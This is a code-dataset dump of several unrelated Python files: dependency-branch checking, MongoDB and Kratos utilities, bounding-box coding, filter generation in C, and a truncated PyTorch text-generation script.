hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bed94396a482917e16322543e53b9186da1d4c36
| 931
|
py
|
Python
|
examples/enforce_branch.py
|
Deca-Technologies/cargo-parse
|
2263f55f40adc22f797fb7514818753e84dc5887
|
[
"MIT"
] | 1
|
2021-12-10T18:22:57.000Z
|
2021-12-10T18:22:57.000Z
|
examples/enforce_branch.py
|
Deca-Technologies/cargo-parse
|
2263f55f40adc22f797fb7514818753e84dc5887
|
[
"MIT"
] | null | null | null |
examples/enforce_branch.py
|
Deca-Technologies/cargo-parse
|
2263f55f40adc22f797fb7514818753e84dc5887
|
[
"MIT"
] | null | null | null |
"""
Example script to demonstrate the usefulness of `cargo-parse`.
In this script, which could run as a GitHub Action, we assert that all Git
dependencies in `Cargo.toml` are using the `master` branch. This check could
run whenever a PR targets the `master` branch.
"""
from pathlib import Path
from cargo_parse import parse_manifest_from_toml
from cargo_parse.models.dependency import GitDependency
PERMITTED_DEPENDENCY_BRANCHES = ["main", "master"]
if __name__ == "__main__":
manifest = parse_manifest_from_toml(Path("../tests/resources/Cargo.toml"))
for dependency in manifest.dependencies:
if isinstance(dependency, GitDependency):
assert (
dependency.branch in PERMITTED_DEPENDENCY_BRANCHES
), "Branch '{}' of `{}` not in {}".format(
dependency.branch,
dependency.name,
PERMITTED_DEPENDENCY_BRANCHES,
)
| 32.103448
| 78
| 0.685285
|
03d1d0f1e56ce38b0df28a6d4f5b602f61b33052
| 470
|
py
|
Python
|
src/aiomongoengine/fields/dict_field.py
|
wangjiancn/aiomongoengine
|
d73e576e0d564b6f741bbc00cadd5285e44d30f9
|
[
"MIT"
] | 6
|
2020-02-09T03:13:20.000Z
|
2021-05-25T07:03:16.000Z
|
src/aiomongoengine/fields/dict_field.py
|
wangjiancn/aiomongoengine
|
d73e576e0d564b6f741bbc00cadd5285e44d30f9
|
[
"MIT"
] | null | null | null |
src/aiomongoengine/fields/dict_field.py
|
wangjiancn/aiomongoengine
|
d73e576e0d564b6f741bbc00cadd5285e44d30f9
|
[
"MIT"
] | null | null | null |
from .base_field import BaseField
class DictField(BaseField):
""" Field responsible for storing dict objects. """
def validate(self, value):
if not isinstance(value, dict):
self.error("StringField only accepts dict values.")
def is_empty(self, value) -> bool:
return value is None or value == {}
def to_son(self, value) -> dict:
if not isinstance(value, dict):
return dict(value)
return value
| 26.111111
| 63
| 0.625532
|
00f402297c3b4da78b868c1d41419e2e9e489fa5
| 7,696
|
py
|
Python
|
kratos/tests/test_function_parser_utility.py
|
hbayraktaroglu/Kratos
|
6b71869ca7adb36a798e0cb11b34287fdc482590
|
[
"BSD-4-Clause"
] | null | null | null |
kratos/tests/test_function_parser_utility.py
|
hbayraktaroglu/Kratos
|
6b71869ca7adb36a798e0cb11b34287fdc482590
|
[
"BSD-4-Clause"
] | null | null | null |
kratos/tests/test_function_parser_utility.py
|
hbayraktaroglu/Kratos
|
6b71869ca7adb36a798e0cb11b34287fdc482590
|
[
"BSD-4-Clause"
] | null | null | null |
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics as KM
import math
import os
import sys
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
class TestGenericFunctionUtility(KratosUnittest.TestCase):
def test_GenericFunctionUtility0(self):
settings = KM.Parameters("""
{
"local_axes" : {}
}
"""
)
current_model = KM.Model()
model_part= current_model.CreateModelPart("Main")
node = model_part.CreateNewNode(1, 1.00,0.00,0.00)
node.X += 0.1
current_time = model_part.ProcessInfo[KM.TIME]
aux_function = KM.GenericFunctionUtility("x", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 1.1)
aux_function = KM.GenericFunctionUtility("X", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 1.0)
aux_function = KM.GenericFunctionUtility("X+Y", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 1.0)
aux_function = KM.GenericFunctionUtility("x+X", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 2.1)
aux_function = KM.GenericFunctionUtility("t", settings["local_axes"])
value = aux_function.CallFunction(node.X , node.Y , node.Z, current_time, node.X0, node.Y0, node.Z0)
self.assertEqual(value, 0.0)
def test_GenericFunctionUtility1(self):
function1 = KM.GenericFunctionUtility("x**2+y**2")
self.assertTrue(function1.DependsOnSpace())
self.assertFalse(function1.UseLocalSystem())
self.assertEqual(function1.FunctionBody(), "x**2+y**2")
self.assertEqual(function1.CallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 25)
function2 = KM.GenericFunctionUtility("3*t")
self.assertFalse(function2.DependsOnSpace())
self.assertFalse(function2.UseLocalSystem())
self.assertEqual(function2.FunctionBody(), "3*t")
self.assertEqual(function2.CallFunction(0.0,0.0,0.0,5.0,0.0,0.0,0.0), 15)
function3 = KM.GenericFunctionUtility("X**2+Y**2")
self.assertTrue(function3.DependsOnSpace())
self.assertFalse(function3.UseLocalSystem())
self.assertEqual(function3.FunctionBody(), "X**2+Y**2")
self.assertEqual(function3.CallFunction(0.0,0.0,0.0,0.0,4.0,3.0,0.0), 25)
function4 = KM.GenericFunctionUtility("(cos(x*pi)+sin(y*pi))*t")
self.assertTrue(function4.DependsOnSpace())
self.assertFalse(function4.UseLocalSystem())
self.assertEqual(function4.FunctionBody(), "(cos(x*pi)+sin(y*pi))*t")
self.assertEqual(function4.CallFunction(0.25,0.15,0.0,1.5,0.0,0.0,0.0), 1.5*(math.cos(0.25*math.pi) + math.sin(0.15*math.pi)))
def test_GenericFunctionUtility2(self):
parameters = KM.Parameters ("""{
"origin" : [0,0,0],
"axes" : [[0,1,0],[1,0,0],[0,0,1]]
}""")
function = KM.GenericFunctionUtility("x+2*y", parameters)
self.assertTrue(function.DependsOnSpace())
self.assertTrue(function.UseLocalSystem())
self.assertEqual(function.FunctionBody(), "x+2*y")
self.assertEqual(function.CallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 10)
self.assertEqual(function.RotateAndCallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 11)
def test_ApplyFunctionToNodesUtility(self):
parameters = KM.Parameters ("""{
"origin" : [0,0,0],
"axes" : [[0,1,0],[1,0,0],[0,0,1]]
}""")
function = KM.GenericFunctionUtility("x+2*y", parameters)
self.assertTrue(function.DependsOnSpace())
self.assertTrue(function.UseLocalSystem())
self.assertEqual(function.FunctionBody(), "x+2*y")
self.assertEqual(function.CallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 10)
self.assertEqual(function.RotateAndCallFunction(4.0,3.0,0.0,0.0,0.0,0.0,0.0), 11)
this_model = KM.Model()
model_part = this_model.CreateModelPart("Main", 2)
current_process_info = model_part.ProcessInfo
current_process_info[KM.DOMAIN_SIZE] = 2
model_part.AddNodalSolutionStepVariable(KM.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KM.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KM.VELOCITY)
model_part_io = KM.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
utility = KM.ApplyFunctionToNodesUtility(model_part.Nodes, function)
utility.ApplyFunction(KM.VISCOSITY, 1.0)
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KM.VISCOSITY) - (node.Y + 2.0 * node.X), 0.0)
def test_ApplyFunctionToNodesUtilityTimeEvolutionTernary(self):
parameters = KM.Parameters ("""{}""")
function = KM.GenericFunctionUtility("1.5*(0.5*(1-cos(0.5*pi*t))*2.0)*(4.0/0.1681)*y*(0.41-y) if t<2.0 else 1.5*(2.0)*(4.0/0.1681)*y*(0.41-y)", parameters)
this_model = KM.Model()
model_part = this_model.CreateModelPart("Main", 2)
current_process_info = model_part.ProcessInfo
current_process_info[KM.DOMAIN_SIZE] = 2
model_part.AddNodalSolutionStepVariable(KM.DISPLACEMENT)
model_part.AddNodalSolutionStepVariable(KM.VISCOSITY)
model_part.AddNodalSolutionStepVariable(KM.VELOCITY)
model_part_io = KM.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
model_part_io.ReadModelPart(model_part)
current_process_info[KM.TIME] = 0.0
time = current_process_info[KM.TIME]
while time < 3.0:
current_process_info[KM.TIME] = current_process_info[KM.TIME] + 1.0
time = current_process_info[KM.TIME]
utility = KM.ApplyFunctionToNodesUtility(model_part.Nodes, function)
utility.ApplyFunction(KM.VISCOSITY, time)
if time < 2.0:
for node in model_part.Nodes:
self.assertEqual(node.GetSolutionStepValue(KM.VISCOSITY) - (1.5*(0.5*(1-math.cos(0.5*math.pi*time))*2.0)*(4.0/0.1681)*node.Y*(0.41-node.Y)), 0.0)
else:
for node in model_part.Nodes:
self.assertAlmostEqual(node.GetSolutionStepValue(KM.VISCOSITY), 1.5*(2.0)*(4.0/0.1681)*node.Y*(0.41-node.Y))
def test_ApplyFunctionToNodesUtilityTimeEvolutionCTernaryFail(self):
parameters = KM.Parameters ("""{
"origin" : [0,0,0],
"axes" : [[0,1,0],[1,0,0],[0,0,1]]
}""")
with self.assertRaisesRegex(Exception, 'Parsing error in function: 1.5 if t<2.0 3.0 if defined, but not else'):
KM.GenericFunctionUtility("1.5 if t<2.0 3.0", parameters)
def test_GenericFunctionUtilityError(self):
with self.assertRaisesRegex(Exception, 'Parsing error in function: \(0\)\*\(50\*\(expp\(t\)-1\)\)\nError occurred near here : \^ \(char \[12\]\)\nCheck your locale \(e.g. if "." or "," is used as decimal point'):
KM.GenericFunctionUtility("(0)*(50*(expp(t)-1))")
if __name__ == '__main__':
KM.Logger.GetDefaultOutput().SetSeverity(KM.Logger.Severity.WARNING)
KratosUnittest.main()
| 42.755556
| 232
| 0.652547
|
7deef52697006affcb92053ef90382c42d0f4898
| 1,923
|
py
|
Python
|
sdxdatamodel/parsing/linkhandler.py
|
atlanticwave-sdx/datamodel
|
f0ca36d45525b37b25357842744b0c300e9246b4
|
[
"MIT"
] | null | null | null |
sdxdatamodel/parsing/linkhandler.py
|
atlanticwave-sdx/datamodel
|
f0ca36d45525b37b25357842744b0c300e9246b4
|
[
"MIT"
] | 6
|
2021-07-20T16:15:48.000Z
|
2021-10-14T13:51:46.000Z
|
sdxdatamodel/parsing/linkhandler.py
|
atlanticwave-sdx/datamodel
|
f0ca36d45525b37b25357842744b0c300e9246b4
|
[
"MIT"
] | null | null | null |
import json
from sdxdatamodel.models.link import Link
from .exceptions import MissingAttributeException
class LinkHandler():
""""
Handler for parsing the connection request descritpion in json
"""
def __init__(self):
super().__init__()
self.link = None
def import_link_data(self, data):
try:
id = data['id']
name=data['name']
short_name=data['short_name']
ports=data['ports']
timestamp=None;t_b=None;a_b=None;latency=None;p_l=None;p_a=None;avai=None;m_p=None
if 'time_stamp' in data.keys():
timestamp=data['time_stamp']
if 'total_bandwidth' in data.keys():
t_b=data['total_bandwidth']
if 'available_bandwidth' in data.keys():
a_b=data['available_bandwidth']
if 'latency' in data.keys():
latency=data['latency']
if 'packet_loss' in data.keys():
p_l=data['packet_loss']
if 'private_attributes' in data.keys():
p_a=data['private_attributes']
if 'availability' in data.keys():
avai=data['availability']
if 'measurement_period' in data.keys():
m_p=data['measurement_period']
except KeyError as e:
raise MissingAttributeException(e.args[0],e.args[0])
link=Link(id=id, name=name, short_name=short_name, ports=ports, total_bandwidth=t_b, available_bandwidth=a_b,
latency=latency, packet_loss=p_l, availability=avai, private_attributes=p_a, time_stamp=timestamp, measurement_period=m_p)
return link
def import_link(self,file):
with open(file, 'r', encoding='utf-8') as data_file:
data = json.load(data_file)
self.link = self.import_link_data(data)
def get_link():
return self.link
| 35.611111
| 134
| 0.592304
|
58c448a8a36ff18c978dead8021d0bd8df14ada2
| 3,172
|
py
|
Python
|
pyleecan/GUI/Dialog/DMachineSetup/SMHoleMag/PHoleM53/Gen_PHoleM53.py
|
helene-t/pyleecan
|
8362de9b0e32b346051b38192e07f3a6974ea9aa
|
[
"Apache-2.0"
] | 1
|
2021-02-26T12:28:45.000Z
|
2021-02-26T12:28:45.000Z
|
GUI/Dialog/DMachineSetup/SMHoleMag/PHoleM53/Gen_PHoleM53.py
|
magnetron/pyleecan
|
2a3338f4ab080ad6488b5ab8746c3fea1f36f177
|
[
"Apache-2.0"
] | null | null | null |
GUI/Dialog/DMachineSetup/SMHoleMag/PHoleM53/Gen_PHoleM53.py
|
magnetron/pyleecan
|
2a3338f4ab080ad6488b5ab8746c3fea1f36f177
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""File generated according to PHoleM53/gen_list.json
WARNING! All changes made in this file will be lost!
"""
from pyleecan.GUI.Dialog.DMachineSetup.SMHoleMag.PHoleM53.Ui_PHoleM53 import Ui_PHoleM53
class Gen_PHoleM53(Ui_PHoleM53):
def setupUi(self, PHoleM53):
"""Abstract class to update the widget according to the csv doc
"""
Ui_PHoleM53.setupUi(self, PHoleM53)
# Setup of in_W1
txt = self.tr(u"""Tooth width (at V bottom)""")
self.in_W1.setWhatsThis(txt)
self.in_W1.setToolTip(txt)
# Setup of lf_W1
self.lf_W1.validator().setBottom(0)
txt = self.tr(u"""Tooth width (at V bottom)""")
self.lf_W1.setWhatsThis(txt)
self.lf_W1.setToolTip(txt)
# Setup of in_W2
txt = self.tr(u"""Distance Magnet to bottom of the V""")
self.in_W2.setWhatsThis(txt)
self.in_W2.setToolTip(txt)
# Setup of lf_W2
self.lf_W2.validator().setBottom(0)
txt = self.tr(u"""Distance Magnet to bottom of the V""")
self.lf_W2.setWhatsThis(txt)
self.lf_W2.setToolTip(txt)
# Setup of in_W3
txt = self.tr(u"""Magnet Width""")
self.in_W3.setWhatsThis(txt)
self.in_W3.setToolTip(txt)
# Setup of lf_W3
self.lf_W3.validator().setBottom(0)
txt = self.tr(u"""Magnet Width""")
self.lf_W3.setWhatsThis(txt)
self.lf_W3.setToolTip(txt)
# Setup of in_W4
txt = self.tr(u"""Slot angle""")
self.in_W4.setWhatsThis(txt)
self.in_W4.setToolTip(txt)
# Setup of lf_W4
self.lf_W4.validator().setBottom(0)
txt = self.tr(u"""Slot angle""")
self.lf_W4.setWhatsThis(txt)
self.lf_W4.setToolTip(txt)
# Setup of in_H0
txt = self.tr(u"""Slot depth""")
self.in_H0.setWhatsThis(txt)
self.in_H0.setToolTip(txt)
# Setup of lf_H0
self.lf_H0.validator().setBottom(0)
txt = self.tr(u"""Slot depth""")
self.lf_H0.setWhatsThis(txt)
self.lf_H0.setToolTip(txt)
# Setup of in_H1
txt = self.tr(u"""Distance from the lamination Bore""")
self.in_H1.setWhatsThis(txt)
self.in_H1.setToolTip(txt)
# Setup of lf_H1
self.lf_H1.validator().setBottom(0)
txt = self.tr(u"""Distance from the lamination Bore""")
self.lf_H1.setWhatsThis(txt)
self.lf_H1.setToolTip(txt)
# Setup of in_H2
txt = self.tr(u"""Magnet Height""")
self.in_H2.setWhatsThis(txt)
self.in_H2.setToolTip(txt)
# Setup of lf_H2
self.lf_H2.validator().setBottom(0)
txt = self.tr(u"""Magnet Height""")
self.lf_H2.setWhatsThis(txt)
self.lf_H2.setToolTip(txt)
# Setup of in_H3
txt = self.tr(u"""Additional depth for the magnet""")
self.in_H3.setWhatsThis(txt)
self.in_H3.setToolTip(txt)
# Setup of lf_H3
self.lf_H3.validator().setBottom(0)
txt = self.tr(u"""Additional depth for the magnet""")
self.lf_H3.setWhatsThis(txt)
self.lf_H3.setToolTip(txt)
| 31.405941
| 88
| 0.600252
|
cb942f6553951b93431cc830d90d85bc87e96cfd
| 7,449
|
py
|
Python
|
mmdet/core/bbox/coder/legacy_delta_xywh_bbox_coder.py
|
fengyouliang/wheat_detection
|
d056123426a1260c29b486cbb8e44a88a0a3c5bc
|
[
"Apache-2.0"
] | null | null | null |
mmdet/core/bbox/coder/legacy_delta_xywh_bbox_coder.py
|
fengyouliang/wheat_detection
|
d056123426a1260c29b486cbb8e44a88a0a3c5bc
|
[
"Apache-2.0"
] | null | null | null |
mmdet/core/bbox/coder/legacy_delta_xywh_bbox_coder.py
|
fengyouliang/wheat_detection
|
d056123426a1260c29b486cbb8e44a88a0a3c5bc
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import torch
from ..builder import BBOX_CODERS
from .base_bbox_coder import BaseBBoxCoder
@BBOX_CODERS.register_module()
class LegacyDeltaXYWHBBoxCoder(BaseBBoxCoder):
"""Legacy Delta XYWH BBox coder used in MMDet V1.x
Following the practice in R-CNN [1]_, this coder encodes bbox (x1, y1, x2,
y2) into delta (dx, dy, dw, dh) and decodes delta (dx, dy, dw, dh)
back to original bbox (x1, y1, x2, y2).
Note:
The main difference between `LegacyDeltaXYWHBBoxCoder` and
`DeltaXYWHBBoxCoder` is whether ``+ 1`` is used during width and height
calculation. We suggest to only use this coder when testing with
MMDet V1.x models.
References:
.. [1] https://arxiv.org/abs/1311.2524
Args:
target_means (Sequence[float]): denormalizing means of target for
delta coordinates
target_stds (Sequence[float]): denormalizing standard deviation of
target for delta coordinates
"""
def __init__(self,
target_means=(0., 0., 0., 0.),
target_stds=(1., 1., 1., 1.)):
super(BaseBBoxCoder, self).__init__()
self.means = target_means
self.stds = target_stds
def encode(self, bboxes, gt_bboxes):
assert bboxes.size(0) == gt_bboxes.size(0)
assert bboxes.size(-1) == gt_bboxes.size(-1) == 4
encoded_bboxes = legacy_bbox2delta(bboxes, gt_bboxes, self.means,
self.stds)
return encoded_bboxes
def decode(self,
bboxes,
pred_bboxes,
max_shape=None,
wh_ratio_clip=16 / 1000):
assert pred_bboxes.size(0) == bboxes.size(0)
decoded_bboxes = legacy_delta2bbox(bboxes, pred_bboxes, self.means,
self.stds, max_shape, wh_ratio_clip)
return decoded_bboxes
def legacy_bbox2delta(proposals,
gt,
means=(0., 0., 0., 0.),
stds=(1., 1., 1., 1.)):
"""Compute deltas of proposals w.r.t. gt in the MMDet V1.x manner.
We usually compute the deltas of x, y, w, h of proposals w.r.t ground
truth bboxes to get regression target.
This is the inverse function of `delta2bbox()`
Args:
proposals (Tensor): Boxes to be transformed, shape (N, ..., 4)
gt (Tensor): Gt bboxes to be used as base, shape (N, ..., 4)
means (Sequence[float]): Denormalizing means for delta coordinates
stds (Sequence[float]): Denormalizing standard deviation for delta
coordinates
Returns:
Tensor: deltas with shape (N, 4), where columns represent dx, dy,
dw, dh.
"""
assert proposals.size() == gt.size()
proposals = proposals.float()
gt = gt.float()
px = (proposals[..., 0] + proposals[..., 2]) * 0.5
py = (proposals[..., 1] + proposals[..., 3]) * 0.5
pw = proposals[..., 2] - proposals[..., 0] + 1.0
ph = proposals[..., 3] - proposals[..., 1] + 1.0
gx = (gt[..., 0] + gt[..., 2]) * 0.5
gy = (gt[..., 1] + gt[..., 3]) * 0.5
gw = gt[..., 2] - gt[..., 0] + 1.0
gh = gt[..., 3] - gt[..., 1] + 1.0
dx = (gx - px) / pw
dy = (gy - py) / ph
dw = torch.log(gw / pw)
dh = torch.log(gh / ph)
deltas = torch.stack([dx, dy, dw, dh], dim=-1)
means = deltas.new_tensor(means).unsqueeze(0)
stds = deltas.new_tensor(stds).unsqueeze(0)
deltas = deltas.sub_(means).div_(stds)
return deltas
def legacy_delta2bbox(rois,
deltas,
means=(0., 0., 0., 0.),
stds=(1., 1., 1., 1.),
max_shape=None,
wh_ratio_clip=16 / 1000):
"""Apply deltas to shift/scale base boxes in the MMDet V1.x manner.
Typically the rois are anchor or proposed bounding boxes and the deltas are
network outputs used to shift/scale those boxes.
This is the inverse function of `bbox2delta()`
Args:
rois (Tensor): Boxes to be transformed. Has shape (N, 4)
deltas (Tensor): Encoded offsets with respect to each roi.
Has shape (N, 4 * num_classes). Note N = num_anchors * W * H when
rois is a grid of anchors. Offset encoding follows [1]_.
means (Sequence[float]): Denormalizing means for delta coordinates
stds (Sequence[float]): Denormalizing standard deviation for delta
coordinates
max_shape (tuple[int, int]): Maximum bounds for boxes. specifies (H, W)
wh_ratio_clip (float): Maximum aspect ratio for boxes.
Returns:
Tensor: Boxes with shape (N, 4), where columns represent
tl_x, tl_y, br_x, br_y.
References:
.. [1] https://arxiv.org/abs/1311.2524
Example:
>>> rois = torch.Tensor([[ 0., 0., 1., 1.],
>>> [ 0., 0., 1., 1.],
>>> [ 0., 0., 1., 1.],
>>> [ 5., 5., 5., 5.]])
>>> deltas = torch.Tensor([[ 0., 0., 0., 0.],
>>> [ 1., 1., 1., 1.],
>>> [ 0., 0., 2., -1.],
>>> [ 0.7, -1.9, -0.5, 0.3]])
>>> legacy_delta2bbox(rois, deltas, max_shape=(32, 32))
tensor([[0.0000, 0.0000, 1.5000, 1.5000],
[0.0000, 0.0000, 5.2183, 5.2183],
[0.0000, 0.1321, 7.8891, 0.8679],
[5.3967, 2.4251, 6.0033, 3.7749]])
"""
means = deltas.new_tensor(means).repeat(1, deltas.size(1) // 4)
stds = deltas.new_tensor(stds).repeat(1, deltas.size(1) // 4)
denorm_deltas = deltas * stds + means
dx = denorm_deltas[:, 0::4]
dy = denorm_deltas[:, 1::4]
dw = denorm_deltas[:, 2::4]
dh = denorm_deltas[:, 3::4]
max_ratio = np.abs(np.log(wh_ratio_clip))
dw = dw.clamp(min=-max_ratio, max=max_ratio)
dh = dh.clamp(min=-max_ratio, max=max_ratio)
# Compute center of each roi
px = ((rois[:, 0] + rois[:, 2]) * 0.5).unsqueeze(1).expand_as(dx)
py = ((rois[:, 1] + rois[:, 3]) * 0.5).unsqueeze(1).expand_as(dy)
# Compute width/height of each roi
pw = (rois[:, 2] - rois[:, 0] + 1.0).unsqueeze(1).expand_as(dw)
ph = (rois[:, 3] - rois[:, 1] + 1.0).unsqueeze(1).expand_as(dh)
# Use exp(network energy) to enlarge/shrink each roi
gw = pw * dw.exp()
gh = ph * dh.exp()
# Use network energy to shift the center of each roi
gx = px + pw * dx
gy = py + ph * dy
# Convert center-xy/width/height to top-left, bottom-right
# The true legacy box coder should +- 0.5 here.
# However, current implementation improves the performance when testing
# the models trained in MMDetection 1.X (~0.5 bbox AP, 0.2 mask AP)
x1 = gx - gw * 0.5
y1 = gy - gh * 0.5
x2 = gx + gw * 0.5
y2 = gy + gh * 0.5
if max_shape is not None:
x1 = x1.clamp(min=0, max=max_shape[1] - 1)
y1 = y1.clamp(min=0, max=max_shape[0] - 1)
x2 = x2.clamp(min=0, max=max_shape[1] - 1)
y2 = y2.clamp(min=0, max=max_shape[0] - 1)
bboxes = torch.stack([x1, y1, x2, y2], dim=-1).view_as(deltas)
return bboxes
| 39.205263
| 80
| 0.534703
|
c7759dca474e5d1aeb4740ecd875244a1cbfc513
| 3,476
|
py
|
Python
|
filter.py
|
navin-bhaskar/GuitarTuner_EdisonGalileo
|
20e31da5f1b395e8405a19f670644b4a2d909ecd
|
[
"BSD-2-Clause"
] | null | null | null |
filter.py
|
navin-bhaskar/GuitarTuner_EdisonGalileo
|
20e31da5f1b395e8405a19f670644b4a2d909ecd
|
[
"BSD-2-Clause"
] | null | null | null |
filter.py
|
navin-bhaskar/GuitarTuner_EdisonGalileo
|
20e31da5f1b395e8405a19f670644b4a2d909ecd
|
[
"BSD-2-Clause"
] | 1
|
2020-03-17T05:54:20.000Z
|
2020-03-17T05:54:20.000Z
|
#!/usr/bin/env python
from scipy import signal
"""
This script generates the c function template for a given cuttof
frequency. Note that this script will use butterworth filter to
generate the differnce equations.
"""
# Define your filter parameters here
Fs = 44100 # Sampling frequency in Hz
Fc = 8000 # Cut-off frequncy in Hz, set to 8k here
order = 2 # Design a second order filter
outFile = "filter" # The output file to be created, without any extension.
#This script will create .c and accompanying .h file for you to use
nyqusitRate = Fs/2.0
Wc = Fc/nyqusitRate # Cutoff freq in normalized to nyquist pi rads/samples
# Get the filter co-efficents for Wc as low pass filter using butterowrth design
[b, a] = signal.butter(order, Wc, 'low')
output= """
/**
* THIS IS AN AUTOMATICALLY GENERATED FILE.
* Implements the difference equation given the input signal.
* The a and b of the DE are defined here locally. Which means that
* you will have to regenrate this file every time the sampling or
* the cut off frequency changes.
*/
static float a[] = {
"""
outText = ""
nPos = 0
inFloat = a.astype(float)
for num in inFloat:
outText = outText + "%+ff, " %num
output = output + outText
output = output + "\n};"
output = output + "\n\nstatic float b[] = { \n"
outText = ""
inFloat = b.astype(float)
for num in inFloat:
outText = outText + "%+ff, " %num
output = output + outText
output = output + "\n};"
functionImp = """
/**
* This function filters the signal.
* This function also takes care of the initial conditions
*/
void iirDirect2(
float *x, /**< Input signal */
float *y, /**< Output signal */
int n /**< Length of the input samples */
)
{
int i;
"""
# Handle the initial condition
initialCond = ""
eq = ""
for i in range(0, order):
eq = eq + " y[%d] = " %(i)
for j in range(0, len(b)):
if i-j < 0:
eq = eq + "b[%d] * 0 " %(j) # Take care of negative indices
else:
eq = eq + "b[%d] * x[%d]" %(j, i-j)
eq = eq + " + "
eq = eq[0:len(eq)-2] # Get rid of extra '+'
eq = eq + " - "
for j in range(1, len(a)): # Ignore the unit gain of the coefficents generated
if i-j < 0:
eq = eq + "(a[%d] * 0) " %(j) # Take care of negative indices
else:
eq = eq + "(a[%d] * y[%d])" %(j, i-j)
eq = eq + " - "
eq = eq[0:len(eq)-2] # Get rid of extra '-'
eq = eq + ";\n"
functionImp = functionImp + eq
# Now for the rest of the equation
theForloop = """
for (i=%d; i<n; i++)
{
"""
eq = " y[i] = "
for j in range(0, len(b)):
eq = eq + "b[%d] * x[i-%d]" %(j, j)
eq = eq + " + "
eq = eq[0:len(eq)-2] # Get rid of extra '+'
eq = eq + " - "
for j in range(1, len(a)):
eq = eq + "(a[%d] * y[i-%d])" %(j, j)
eq = eq + " - "
eq = eq[0:len(eq)-2] # Get rid of extra '-'
eq = eq + ";\n"
theForloop = theForloop %(order)
theForloop = theForloop + eq + "\n }\n}"
functionImp = functionImp + theForloop
output = output + functionImp
#print output
# create the header file first
headerContent = """
#ifndef __FILTER_H
#define __FILTER_H
void iirDirect2(float *, float *, int);
#endif
"""
f = file(outFile+".h", "w")
f.write(headerContent)
f.close()
f = file(outFile+".c", "w")
f.write(output)
f.close()
| 22
| 82
| 0.564442
|
69544afab18defc139311bea075a73e30a48249d
| 3,163
|
py
|
Python
|
word_language_model/generate.py
|
manna/pytorch-examples
|
659e11ac42fe46ea09bcaf8424ed5404fae7407d
|
[
"BSD-3-Clause"
] | null | null | null |
word_language_model/generate.py
|
manna/pytorch-examples
|
659e11ac42fe46ea09bcaf8424ed5404fae7407d
|
[
"BSD-3-Clause"
] | null | null | null |
word_language_model/generate.py
|
manna/pytorch-examples
|
659e11ac42fe46ea09bcaf8424ed5404fae7407d
|
[
"BSD-3-Clause"
] | null | null | null |
###############################################################################
# Language Modeling on Penn Tree Bank
#
# This file generates new sentences sampled from the language model
#
###############################################################################
import argparse
import torch
from torch.autograd import Variable
import data
parser = argparse.ArgumentParser(description='PyTorch Wikitext-2 Language Model')
# Model parameters.
parser.add_argument('--data', type=str, default='./data/wikitext-2',
help='location of the data corpus')
parser.add_argument('--checkpoint', type=str, default='./model.pt',
help='model checkpoint to use')
parser.add_argument('--outf', type=str, default='generated.txt',
help='output file for generated text')
parser.add_argument('--words', type=int, default='1000',
help='number of words to generate')
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--cuda', action='store_true',
help='use CUDA')
parser.add_argument('--temperature', type=float, default=1.0,
help='temperature - higher will increase diversity')
parser.add_argument('--log-interval', type=int, default=100,
help='reporting interval')
parser.add_argument('--primer', type=str, default='',
help='Beginning of generated text. Example: "Yesterday , she"')
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
device = torch.device("cuda" if args.cuda else "cpu")
if args.temperature < 1e-3:
parser.error("--temperature has to be greater or equal 1e-3")
with open(args.checkpoint, 'rb') as f:
model = torch.load(f).to(device)
model.eval()
corpus = data.Corpus(args.data)
ntokens = len(corpus.dictionary)
hidden = model.init_hidden(1)
